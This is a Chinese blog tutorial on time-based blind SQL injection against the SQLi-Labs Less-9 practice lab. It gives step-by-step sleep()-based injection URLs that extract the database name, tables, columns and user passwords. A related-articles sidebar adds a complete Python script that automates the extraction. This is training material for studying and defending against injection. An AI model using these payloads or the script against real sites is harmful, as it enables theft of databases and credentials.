基于时间的盲注

最新推荐文章于 2024-07-25 10:08:48 发布
最新推荐文章于 2024-07-25 10:08:48 发布
阅读量1.2k 收藏 6
点赞数 2
分类专栏: SQL注入 文章标签: web安全 SQL注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Z_l123/article/details/123007138
版权

关于时间(延时)盲注

某些场合下,页面只有一种返回结果,使用具有延时功能的函数sleep()、benchmark()等,通过判断这些函数是否正常执行来获取数据库中的数据。

一些功能函数的说明

length(str):返回字符串(str)的长度,以字节为单位。
substr(str,pos,len):从指定的位置(pos)开始,截取并返回字符串(str)指定长度(len)的子串。
ascii(str):返回字符串(str)最左边字符的ASCll码。
if(expr1,expr2,expr3):条件判断函数,expr1为true则返回expr2, expr1为false则返回expr3。
sleep(N):让语句延迟执行一段时间(N秒),执行成功后返回0。
benchmark(count,expr):让expr执行count次,执行成功后返回0。

1.访问SQLi-Labs网站

1)访问Less-9,根据网页提示,给定一个?id=1的参数

http://127.0.0.1/sqli-labs/Less-9/?id=1

此时页面显示信息为You are in ......

2)若给定一个?id=-1的参数

http://127.0.0.1/sqli-labs/Less-9/?id=-1

 此时页面显示信息仍然为You are in ......

 可以继续给定不同的id参数进行尝试,发现页面的显示结果只有一种: You are in...。由此可以判断,这是一种典型的时间(延时)盲注场景!

2.寻找注入点

http://127.0.0.1/sqli-labs/Less-9/?id=1 and sleep(5) --+

 sleep(5)未执行,页面无明显延迟

http://127.0.0.1/sqli-labs/Less-9/?id=1' and sleep(5) --+

由上述结果可以判断,网站存在字符型注入点

3.盲猜网站当前所在数据库的库名长度

 假设当前所在数据库的库名长度为N,尝试使用判断语句if((length(database())=M),sleep(5),1),不断变化M的值去猜测,如果M等于N,此时sleep(5)会成功执行,页面应该会有明显延迟。

http://127.0.0.1/sqli-labs/Less-9/?id=1' and if(length(database())=7,sleep(5),1) --+

  页面无明显延迟,说明网站当前所在数据库的库名长度不是7个字符

http://127.0.0.1/sqli-labs/Less-9/?id=1' and if(length(database())=8,sleep(5),1) --+

   页面有明显延迟,说明网站当前所在数据库的库名长度是8个字符

4.盲猜网站数据库当前所在数据库的库名字符串

猜测库名的第一个字母

http://127.0.0.1/sqli-labs/Less-9/?id=1' and if(substr(database(),1,1)='a',sleep(5),1) --+

页面无明显延迟,第一个字母不是a

...

http://127.0.0.1/sqli-labs/Less-9/?id=1' and if(substr(database(),1,1)='s',sleep(5),1) --+

 页面明显延迟,第一个字母是s

猜测库名的第二个字母

http://127.0.0.1/sqli-labs/Less-9/?id=1' and if(substr(database(),2,1)='e',sleep(5),1) --+

页面无明显延迟,第二个字母不是a

...

http://127.0.0.1/sqli-labs/Less-9/?id=1' and if(substr(database(),2,1)='e',sleep(5),1) --+

 页面明显延迟,第二个字母是e

...

最终得到的字符串结果为security

5.盲猜数据库security的全部表名

1)猜测第一张表的表名

猜测第一张表的表名的第一个字符

http://127.0.0.1/sqli-labs/Less-9/?id=1' and if(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1)='a',sleep(5),1) --+

 页面无明显延迟,第一个字母不是a

...

http://127.0.0.1/sqli-labs/Less-9/?id=1' and if(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1)='e',sleep(5),1) --+

 页面明显延迟,第一个字母是e

猜测第一张表的表名的第二个字符

http://127.0.0.1/sqli-labs/Less-9/?id=1' and if(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),2,1)='a',sleep(5),1) --+

 页面无明显延迟,第二个字母不是a

...

 http://127.0.0.1/sqli-labs/Less-9/?id=1' and if(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),2,1)='m',sleep(5),1) --+

  页面明显延迟,第二个字母是m

猜测第一张表的表名的第三个字符

http://127.0.0.1/sqli-labs/Less-9/?id=1' and if(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),3,1)='a',sleep(5),1) --+

 ...

最终得到第一个表的表名为emails

 2)猜测第二张表的表名

猜测第二张表的表名的第一个字符

http://127.0.0.1/sqli-labs/Less-9/?id=1' and if(substr((select table_name from information_schema.tables where table_schema='security' limit 1,1),1,1)='a',sleep(5),1) --+

  页面无明显延迟,第一个字母不是a

...

第一个字母是r

猜测第二张表的表名的第二个字符

http://127.0.0.1/sqli-labs/Less-9/?id=1' and if(substr((select table_name from information_schema.tables where table_schema='security' limit 1,1),2,1)='a',sleep(5),1) --+

...

 最终得到第二个表的表名为referers

依据上述方法,通过不断变换limit和 substr()函数中的参数,可以最终得到security库中所有表的表名:emails、referers、uagents和users。

其中,第4张表users当中可能存放着网站用户的基本信息

6.盲猜users表的全部字段名

 猜测第一个字段名

 猜测第一个字段名的第一个字符

http://127.0.0.1/sqli-labs/Less-9/?id=1' and if(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1)='a',sleep(5),1) --+

...

最终得到所有字段名:id,username,password

7.盲猜users表username和password字段的全部值

猜测第一组数据

猜测第一组数据的第一个字符

http://127.0.0.1/sqli-labs/Less-9/?id=1' and if(substr((select concat_ws(',',username,password) from security.users limit 0,1),1,1)='a',sleep(5),1) --+

 ...

注意:字符串中的逗号(,)也是需要进行猜测比对的!例如第1组数据的第5个字符:

http://127.0.0.1/sqli-labs/Less-9/?id=1' and if(substr((select concat_ws(',',username,password) from security.users limit 0,1),5,1)=',',sleep(5),1) --+

 依据上述方法,通过不断变换limit和substr()函数中的参数,可以最终得到users表中username和password字段的全部值。

Z_l123
关注
  • 2
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
mysql基于时间盲注_基于时间型SQL盲注
weixin_39581739的博客
02-08 228
1 基于时间型SQL盲注注入SQL 代码之后, 存在以下两种情况:如果注入的SQL代码不影响后台[ 数据库] 的正常功能执行, 那么Web 应用的页面显示正确( 原始页面) 。如果注入的SQL 代码影响后台数据库的正常功能( 产生了SQL 注入) , 但是此时Web 应用的页面依旧显示正常( 原因是Web 应用程序采取了“ 重定向" 或“ 屏蔽 ”措施)。产生一个疑问: 注入的SQL 代码到底被后...
mysql基于时间盲注_MYSQL基于时间盲注详解
weixin_30864831的博客
02-08 1170
MYSQL基于时间盲注联合查询,报错注入,以及布尔盲注,都是基于攻击网站会回显消息,或者将错误信息返回在前端,或者会返回web页面的正确或错误但是有时候网站关闭了错误回显或过滤了某些关键字,网页会返回一种状态(status,只要进行了http传输,那么就会有一个状态值),这时候就要用到时间盲注时间盲注的基本函数if(1,2,3):如果1为True,则执行2,否则执行3sleep(x):延迟x秒之...
2024年网络安全最新超硬核,SQL注入时间盲注,原理+步骤+实战思路
2401_84252281的博客
05-02 238
如果页面响应时间超过5秒,说明长度判断正确(sleep(5));如果页面响应时间不超过5秒(正常响应),说明长度判断错误,继续递增判断长度。
基于时间盲注
weixin_41489908的博客
09-29 544
遗憾的是,两个人不能在一起,却偏偏相遇。。。 ---- 网易云热评 一、函数介绍 1、sleep(5):暂停5秒再返回结果 2、if(条件,表达式1,表达式2):如果条件为真,返回表达式1,否则返回表达式2 3、substr('admin',2,3):从第二个位置开始截取长度为3的字符串,即dmi 4、substring('admin',2,3):效果和上面一样 5、substring('admin' from 2 for 1):截取一个字母,省略了逗号 6、substring('admi.
基于时间盲注的python脚本
weixin_43460822的博客
10-07 2279
思路:重要的是构建payload,然后循环进行测试,通过对请求的时间进行判断payload是否正确,从而确定数据库的长度和数据库的名称. #encoding=utf-8 #时间盲注脚本 import requests import time import datetime #获取数据库长度 def database_len(): #存放跑出的结果 length=0 ...
CTF从入门到提升(四)基于时间盲注例题及解法_ctf时间盲注流量提取(1)
2401_84302369的博客
05-16 280
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!内容实在太多,不一一截图了。
SQL注入---基于时间盲注
Ethan024的博客
03-31 461
SQL注入—基于时间盲注 实验平台: 皮卡丘靶场—盲注(base on time) 实验原理: 输入单引号’,确定此处没有报错信息: 输入payload:kobe’ and 1=1#,发现也没有报错信息 在浏览器后台—网络中查看payload执行时间:kobe’ and sleep(5)# 此处执行了sleep(5),执行时间用了5000ms。因此此处存在SQL注入,并且是基于时间盲注。 基于时间的延迟的payload:kobe’ and if((substr(database(),
mysql基于时间盲注_mysql基于“时间”的盲注
weixin_42494742的博客
01-19 100
mysql基于时间盲注======================================================================================================================================================================*猜解库名-下面是猜解正确mysql>...
mysql基于时间盲注_mysql order by基于时间盲注
weixin_29164185的博客
02-08 111
order by后面的注入,一般先尝试报错注入,无报错的时候可以通过rand(ture)和rand(false)来进行bool型盲注,但是今天遇到完全没有数据回显的(也就是数据库中没有数据)情况,这就比较麻烦了。记录一下sql语句参考文章:https://www.cnblogs.com/babers/p/7397525.htmlhttps://www.cnblogs.com/Vinson404/p...
mysql基于时间盲注_MySQL基于时间盲注(Time-Based Blind SQL Injection)五种延时方法...
weixin_42527178的博客
01-19 942
PWNHUB 一道盲注题过滤了常规的sleep和benchmark函数,引发对时间盲注中延时方法的思考。延时函数SLEEPmysql> select sleep(5);+----------+| sleep(5) |+----------+| 0 |+----------+1 row in set (5.00 sec)BENCHMARKmysql> select benc...
第九节 POST基于时间和布尔的盲注-01
09-15
_POST 基于时间和布尔的盲注_ 在 Web 应用程序安全测试中,盲注是一种常见的攻防手法。盲注可以分为基于时间盲注和基于布尔的盲注两种。下面我们将详细介绍这两种盲注技术。 一、HTTP POST 介绍 在 HTTP 协议中...
mysql-blind(高级盲注+基于布尔).docx
01-23
盲注主要分为基于时间、布尔和错误的三种类型,本篇将专注于布尔型盲注的详细讲解。 0x01 什么是布尔型盲注 布尔型盲注是通过判断SQL语句执行结果是否影响页面的输出状态来探测注入点是否存在。如果注入的条件为真...
布尔盲注python脚本.zip
12-28
- 延迟检测:对于基于响应时间的判断,可能需要使用定时器来测量请求之间的延迟,以确定是否存在差异。 - 逻辑判断:Python脚本将根据预设的判断逻辑(如响应时间阈值、状态码匹配等)来确认注入的有效性。 5. **...
SQL盲注利用工具
11-15
2. **时间盲注**:与延迟盲注类似,但不是通过延时函数,而是通过精确计算查询执行的时间差异来获取信息。例如,使用IF()或CASE WHEN...THEN...END语句,根据不同的结果路径来改变查询执行的时间。 3. **基于字符的...
sql盲注检测的简单脚本.zip
03-10
2. **盲注类型**:盲注通常分为时间盲注和布尔基盲注时间盲注是通过判断查询执行时间来确定结果,比如注入一个延时操作,看系统响应时间是否改变。布尔基盲注则依赖于系统的返回状态,例如,通过观察“存在”...
网络安全之初始访问阶段攻防手段(三)
最新发布
子非渔
07-25 990
初始访问阶段攻防手段(SEIM、NDR、EDR、XDR、SOC、态势感知、僵木蠕、DNS、NETFLOW、DDOS、WAF、防火墙、日志审计)以及使用场景。
微软蓝屏事件:网络安全的多维挑战与应对策略
sinner小屋
07-23 786
微软蓝屏事件,这一近期震动全球科技界的重大事件,起因于一次看似平常的软件更新。美国电脑安全技术公司“众击”发布的更新包中隐藏着一个致命的“缺陷”,这个缺陷如同潜伏的病毒,一旦被激活,便在全球范围内引发了连锁反应。近850万台设备,从个人电脑到关键行业的服务器,无一幸免地遭遇了系统崩溃,屏幕上只剩下一片冰冷的蓝色。这一事件不仅影响了日常办公,更是波及了航空、医疗、传媒等关键领域,造成了航班延误、医疗服务中断、信息传播受阻等一系列严重后果。
网络安全相关竞赛比赛
黑战士的博客
07-18 1072
湖南省委网信办联合省教育厅、省广播电视局、省政务管理服务局、省通信管理局、长沙市人民政府等6家单位共同主办。教育部认可的大学生学科竞赛网站链接(2023版)关键字:比赛、CTF、赛事、技能挑战。浙江省大学生网络与信息安全竞赛。全国网络安全行业职业技能大赛。湖南省“网安湘军杯”
能帮我写一个Python程序,基于sql-lab第九关的时间盲注,要能够获取数据库名,表名,列名和数据的。
06-06
当然可以帮你写一个基于时间盲注的Python程序,获取数据库名,表名,列名和数据。以下是示例代码: ```python import requests import string # 数据库名长度 db_name_length = 0 # 数据库名 db_name = '' # 表名列表 table_names = [] # 列名列表 column_names = [] # 数据列表 data_list = [] # SQL注入语句的前缀和后缀 sql_prefix = "1' and if((select ascii(substring(database(),{},1)))={},sleep(3),1)-- -" sql_suffix = '' # 发送请求的函数 def make_request(payload): url = "http://your-ip/sql-lab/my-query" data = { 'query': payload, 'submit': 'Submit Query' } headers = { 'Cookie': 'session=your-session-id' } response = requests.post(url, data=data, headers=headers) return response.elapsed.total_seconds() # 获取数据库名长度 for i in range(1, 100): payload = sql_prefix.format(i, 97) if make_request(payload) >= 3: db_name_length = i break # 获取数据库名 for i in range(1, db_name_length + 1): for j in string.printable: payload = sql_prefix.format(i, ord(j)) if make_request(payload) >= 3: db_name += j break # 获取表名列表 payload = "1' and if((select count(*) from information_schema.tables where table_schema='{}')={},sleep(3),1)-- -".format(db_name, 0) if make_request(payload) >= 3: table_count_payload = "1' and if((select count(*) from information_schema.tables where table_schema='{}')={},sleep(3),1)-- -".format(db_name, 1) table_count = 0 for i in range(1, 100): payload = table_count_payload.format(i) if make_request(payload) >= 3: table_count = i break for i in range(table_count): table_payload = "1' and if((select ascii(substring(table_name,{},1)) from information_schema.tables where table_schema='{}' limit {},1)={},sleep(3),1)-- -".format(1, db_name, i, 0) table_name_length = 0 for j in range(1, 100): payload = table_payload.format(j) if make_request(payload) >= 3: table_name_length = j break table_name = '' for j in range(1, table_name_length + 1): for k in string.printable: payload = "1' and if((select ascii(substring(table_name,{},1)) from information_schema.tables where table_schema='{}' limit {},1)={},sleep(3),1)-- -".format(j, db_name, i, ord(k)) if make_request(payload) >= 3: table_name += k break table_names.append(table_name) # 获取列名列表和数据列表 for table_name in table_names: column_payload = "1' and if((select count(*) from information_schema.columns where table_schema='{}' and table_name='{}')={},sleep(3),1)-- -".format(db_name, table_name, 0) if make_request(column_payload) >= 3: column_count_payload = "1' and if((select count(*) from information_schema.columns where table_schema='{}' and table_name='{}')={},sleep(3),1)-- -".format(db_name, table_name, 1) column_count = 0 for i in range(1, 100): payload = column_count_payload.format(i) if make_request(payload) >= 3: column_count = i break for i in range(column_count): column_payload = "1' and if((select ascii(substring(column_name,{},1)) from information_schema.columns where table_schema='{}' and table_name='{}' limit {},1)={},sleep(3),1)-- -".format(1, db_name, table_name, i, 0) column_name_length = 0 for j in range(1, 100): payload = column_payload.format(j) if make_request(payload) >= 3: column_name_length = j break column_name = '' for j in range(1, column_name_length + 1): for k in string.printable: payload = "1' and if((select ascii(substring(column_name,{},1)) from information_schema.columns where table_schema='{}' and table_name='{}' limit {},1)={},sleep(3),1)-- -".format(j, db_name, table_name, i, ord(k)) if make_request(payload) >= 3: column_name += k break column_names.append(column_name) data_payload = "1' and if((select count(*) from {})={},sleep(3),1)-- -".format(table_name, 0) if make_request(data_payload) >= 3: data_count_payload = "1' and if((select count(*) from {})={},sleep(3),1)-- -".format(table_name, 1) data_count = 0 for j in range(1, 100): payload = data_count_payload.format(j) if make_request(payload) >= 3: data_count = j break for j in range(data_count): data_item = {} for column_name in column_names: data_payload = "1' and if((select ascii(substring({},1)) from {} limit {},1)={},sleep(3),1)-- -".format(column_name, table_name, j, 0) data_length = 0 for k in range(1, 100): payload = data_payload.format(k) if make_request(payload) >= 3: data_length = k break data_value = '' for k in range(1, data_length + 1): for l in string.printable: payload = "1' and if((select ascii(substring({},{})) from {} limit {},1)={},sleep(3),1)-- -".format(column_name, k, table_name, j, ord(l)) if make_request(payload) >= 3: data_value += l break data_item[column_name] = data_value data_list.append(data_item) # 打印结果 print('Database name: {}'.format(db_name)) print('Table names: {}'.format(table_names)) print('Column names: {}'.format(column_names)) print('Data: {}'.format(data_list)) ``` 需要修改的地方: 1. 将 `your-ip` 替换成 sql-lab 的 IP 地址 2. 将 `your-session-id` 替换成你的 sql-lab 的 session ID 注意:这个程序只适用于 sql-lab 第九关的时间盲注。如果你要用于其他情况,请适当修改代码。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值